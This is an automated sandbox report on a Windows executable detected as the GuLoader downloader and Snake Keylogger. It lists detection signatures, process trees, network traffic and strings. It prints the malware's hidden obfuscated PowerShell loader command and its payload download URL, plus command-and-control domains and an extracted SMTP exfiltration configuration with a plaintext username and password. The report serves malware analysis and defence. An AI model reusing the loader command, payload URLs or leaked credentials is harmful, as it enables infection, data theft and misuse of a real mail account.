Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Confirmation transfer Note AGS # 22-00379.exe

Overview

General Information

Sample name:Confirmation transfer Note AGS # 22-00379.exe
Analysis ID:1481030
MD5:baf114ac8dab2634a6f9e33cc67c4b33
SHA1:66da72ca66c33a928a401d160875f82af9f89bc0
SHA256:87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
Tags:exe
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Confirmation transfer Note AGS # 22-00379.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe" MD5: BAF114AC8DAB2634A6F9E33CC67C4B33)
    • powershell.exe (PID: 424 cmdline: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 7476 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • WerFault.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "manjunath_y@bluewavecomputers.in", "Password": "Bluewave@mnc2020", "Host": "mail.bluewavecomputers.in", "Port": "587"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7476, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532, ProcessId: 7672, ProcessName: WerFault.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", ParentImage: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, ParentProcessId: 5340, ParentProcessName: Confirmation transfer Note AGS # 22-00379.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", ProcessId: 424, ProcessName: powershell.exe
      No Snort rule has matched
      Timestamp:2024-07-25T03:10:19.449026+0200
      SID:2803270
      Source Port:49707
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-07-25T03:10:49.744744+0200
      SID:2028371
      Source Port:49723
      Destination Port:443
      Protocol:TCP
      Classtype:Unknown Traffic
      Timestamp:2024-07-25T03:10:00.245750+0200
      SID:2022930
      Source Port:443
      Destination Port:49702
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T03:10:38.895890+0200
      SID:2022930
      Source Port:443
      Destination Port:49714
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: malware
      Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
      Source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manjunath_y@bluewavecomputers.in", "Password": "Bluewave@mnc2020", "Host": "mail.bluewavecomputers.in", "Port": "587"}
      Source: http://aborters.duckdns.org:8081Virustotal: Detection: 11%Perma Link
      Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 14%Perma Link
      Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exeReversingLabs: Detection: 50%
      Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exeVirustotal: Detection: 58%Perma Link
      Source: Confirmation transfer Note AGS # 22-00379.exeReversingLabs: Detection: 50%
      Source: Confirmation transfer Note AGS # 22-00379.exeVirustotal: Detection: 58%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Confirmation transfer Note AGS # 22-00379.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\exe\wab.pdb_j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wab.pdbVowV source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.pdbd source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdbd source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\exe\wab.pdbwj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\mscorlib.pdb7j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n(C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: nC:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5987.tmp.dmp.18.dr
      Source: Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000002.00000002.1633101698.0000000008600000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BO$ .pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: wab.pdb-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32``oj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblb source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb@ source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdbaD source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB_ source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbBX source: powershell.exe, 00000002.00000002.1622648515.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
      Source: Binary string: !symbols\exe\wab.pdb30 source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdbws\wab.pdbpdbwab.pdbmail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdbiB source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb` source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbWj% source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb| source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdb& source: WER5987.tmp.dmp.18.dr
      Source: Binary string: C:\Windows\wab.pdbpdbwab.pdbq source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: Joe Sandbox ViewIP Address: 108.167.181.251 108.167.181.251
      Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS query: name: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.reap.skyestates.com.mt
      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
      Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
      Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
      Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
      Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
      Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.000000002201C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
      Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
      Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
      Source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000002.00000002.1630220347.000000000754A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microw
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://s.symcd.com06
      Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
      Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
      Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/
      Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exeJump to dropped file
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00404B0E0_2_00404B0E
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040653D0_2_0040653D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048CEAD82_2_048CEAD8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048CF3A82_2_048CF3A8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048CE7902_2_048CE790
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_02F23E0914_2_02F23E09
